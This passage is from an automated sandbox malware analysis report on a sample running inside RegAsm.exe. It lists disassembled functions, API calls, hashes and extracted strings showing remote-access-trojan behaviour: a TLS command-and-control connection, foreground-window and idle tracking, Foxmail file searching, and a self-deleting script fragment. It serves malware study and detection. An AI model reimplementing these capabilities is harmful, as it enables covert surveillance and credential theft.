call 41b4ef 949->951 950->951 963 415a71-415a7d CreateThread 951->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 951->964 952->949 963->964 964->627
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$5.1.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                          • API String ID: 524882891-1990110553
                                                          • Opcode ID: 393f2b5be73a67f98368190a6b19e913f4c8fc589de8849857cca0a622a79bac
                                                          • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                          • Opcode Fuzzy Hash: 393f2b5be73a67f98368190a6b19e913f4c8fc589de8849857cca0a622a79bac
                                                          • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                                          Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 971 412ab4-412afd GetModuleFileNameW call 4020df * 3 978 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 971->978 1003 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 978->1003 1026 412c2b 1003->1026 1027 412c1d-412c25 Sleep 1003->1027 1028 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412ccd 1028->1051 1052 412cbf-412cc7 Sleep 1028->1052 1053 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412d61-412d69 Sleep 1053->1076 1077 412d6f-412d94 1053->1077 1076->1053 1076->1077 1078 412d98-412db4 call 401f04 call 41c485 1077->1078 1083 412db6-412dc5 call 401f04 DeleteFileW 1078->1083 1084 412dcb-412de7 call 401f04 call 41c485 1078->1084 1083->1084 1091 412e04 1084->1091 1092 412de9-412e02 call 401f04 DeleteFileW 1084->1092 1094 412e08-412e24 call 401f04 call 41c485 1091->1094 1092->1094 1100 412e26-412e38 call 401f04 DeleteFileW 1094->1100 1101 412e3e-412e40 1094->1101 1100->1101 1102 412e42-412e44 1101->1102 1103 412e4d-412e58 Sleep 1101->1103 1102->1103 1106 412e46-412e4b 1102->1106 1103->1078 1107 412e5e-412e70 call 406b28 1103->1107 1106->1103 1106->1107 1110 412e72-412e80 call 406b28 1107->1110 1111 412ec6-412ee5 call 401f09 * 3 1107->1111 1110->1111 1117 412e82-412e90 call 406b28 1110->1117 1122 412eea-412f4e call 40b904 call 401f04 call 4020f6 call 41322d call 401f09 call 405b05 1111->1122 1117->1111 1123 412e92-412ebe Sleep call 401f09 * 3 1117->1123 1143 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1122->1143 1144 4130a8-413151 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 1122->1144 1123->978 1137 412ec4 1123->1137 1137->1122 1213 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1183 413156-4131a1 call 401fd8 * 7 1144->1183 1183->1213
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                          • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                          • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                          • Sleep.KERNEL32(00000064), ref: 00412E94
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$0TG$0TG$NG$NG
                                                          • API String ID: 1223786279-2576077980
                                                          • Opcode ID: 76d926ec511b1af110b970dbc33056e1a2348894721dd65b52e50139ae7f6007
                                                          • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                          • Opcode Fuzzy Hash: 76d926ec511b1af110b970dbc33056e1a2348894721dd65b52e50139ae7f6007
                                                          • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                          Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                            • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                          • String ID: )$Foxmail$ProgramFiles
                                                          • API String ID: 672098462-2938083778
                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                          Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 0040A740
                                                            • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                            • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                            • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                            • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                          • API String ID: 3795512280-1152054767
                                                          • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                          • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                          • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                          • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                          Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1384 4048c8-4048e8 connect 1385 404a1b-404a1f 1384->1385 1386 4048ee-4048f1 1384->1386 1389 404a21-404a2f WSAGetLastError 1385->1389 1390 404a97 1385->1390 1387 404a17-404a19 1386->1387 1388 4048f7-4048fa 1386->1388 1391 404a99-404a9e 1387->1391 1392 404926-404930 call 420c60 1388->1392 1393 4048fc-404923 call 40531e call 402093 call 41b4ef 1388->1393 1389->1390 1394 404a31-404a34 1389->1394 1390->1391 1404 404941-40494e call 420e8f 1392->1404 1405 404932-40493c 1392->1405 1393->1392 1397 404a71-404a76 1394->1397 1398 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1394->1398 1401 404a7b-404a94 call 402093 * 2 call 41b4ef 1397->1401 1398->1390 1401->1390 1418 404950-404973 call 402093 * 2 call 41b4ef 1404->1418 1419 404987-404992 call 421a40 1404->1419 1405->1401 1445 404976-404982 call 420ca0 1418->1445 1430 4049c4-4049d1 call 420e06 1419->1430 1431 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1419->1431 1442 4049d3-4049f6 call 402093 * 2 call 41b4ef 1430->1442 1443 4049f9-404a14 CreateEventW * 2 1430->1443 1431->1445 1442->1443 1443->1387 1445->1390
                                                          APIs
                                                          • connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                          • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                          • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                          • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                          Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                          • GetForegroundWindow.USER32 ref: 0040AD49
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                          • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                          • Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                          • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                          Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1539 40da34-40da59 call 401f86 1542 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1539->1542 1543 40da5f 1539->1543 1545 40da70-40da7e call 41b5b4 call 401f13 1543->1545 1546 40da91-40da96 1543->1546 1547 40db51-40db56 1543->1547 1548 40daa5-40daac call 41bfb7 1543->1548 1549 40da66-40da6b 1543->1549 1550 40db58-40db5d 1543->1550 1551 40da9b-40daa0 1543->1551 1552 40db6e 1543->1552 1553 40db5f-40db6c call 43c0cf 1543->1553 1570 40da83 1545->1570 1554 40db73 call 43c0cf 1546->1554 1547->1554 1568 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1548->1568 1569 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1548->1569 1549->1554 1550->1554 1551->1554 1552->1554 1553->1552 1564 40db79-40db7e call 409057 1553->1564 1565 40db78 1554->1565 1564->1542 1565->1564 1568->1570 1575 40da87-40da8c call 401f09 1569->1575 1570->1575 1575->1542
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                          • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                          • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                          • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                          Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1672 41c3f1-41c402 1673 41c404-41c407 1672->1673 1674 41c41a-41c421 1672->1674 1675 41c410-41c418 1673->1675 1676 41c409-41c40e 1673->1676 1677 41c422-41c43b CreateFileW 1674->1677 1675->1677 1676->1677 1678 41c441-41c446 1677->1678 1679 41c43d-41c43f 1677->1679 1681 41c461-41c472 WriteFile 1678->1681 1682 41c448-41c456 SetFilePointer 1678->1682 1680 41c47f-41c484 1679->1680 1684 41c474 1681->1684 1685 41c476-41c47d FindCloseChangeNotification 1681->1685 1682->1681 1683 41c458-41c45f CloseHandle 1682->1683 1683->1679 1684->1685 1685->1680
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                          • String ID: hpF
                                                          • API String ID: 1087594267-151379673
                                                          • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                          • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                          • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                          • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                          Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1686 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1697 41b35d-41b366 1686->1697 1698 41b31c-41b32b call 4135a6 1686->1698 1700 41b368-41b36d 1697->1700 1701 41b36f 1697->1701 1703 41b330-41b347 call 401fab StrToIntA 1698->1703 1702 41b374-41b37f call 40537d 1700->1702 1701->1702 1708 41b355-41b358 call 401fd8 1703->1708 1709 41b349-41b352 call 41cf69 1703->1709 1708->1697 1709->1708
                                                          APIs
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                            • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                            • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                            • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 782494840-2070987746
                                                          • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                          • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                          • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                          • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                          Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                            • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2099061454-0
                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                          Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2099061454-0
                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                          Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
